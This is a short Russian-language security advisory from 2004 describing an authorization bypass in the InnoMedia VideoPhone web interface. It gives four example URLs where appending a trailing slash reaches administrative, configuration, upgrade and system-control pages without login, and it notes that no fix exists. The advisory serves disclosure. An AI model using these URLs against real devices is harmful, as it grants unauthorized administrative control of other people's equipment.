Обход авторизации в InnoMedia VideoPhone

Дата публикации:
25.03.2004
Всего просмотров:
972
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: InnoMedia VideoPhone au75200xvi04010x

Описание: Несколько уязвимостей обнаружено в Web интерфейсе InnoMedia VideoPhone. Удаленный пользователь может обойти авторизацию, чтобы получить доступ к административному интерфейсу.

Удаленный пользователь может получить доступ к некоторым административным сценариям без аутентификации, представляя слеш '/' с URL:

Пример/Эксплоит:

http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
ht tp://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/

URL производителя:http://www.innomedia.com/default.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: InnoMedia VideoPhone Authorization Bypass

или введите имя

CAPTCHA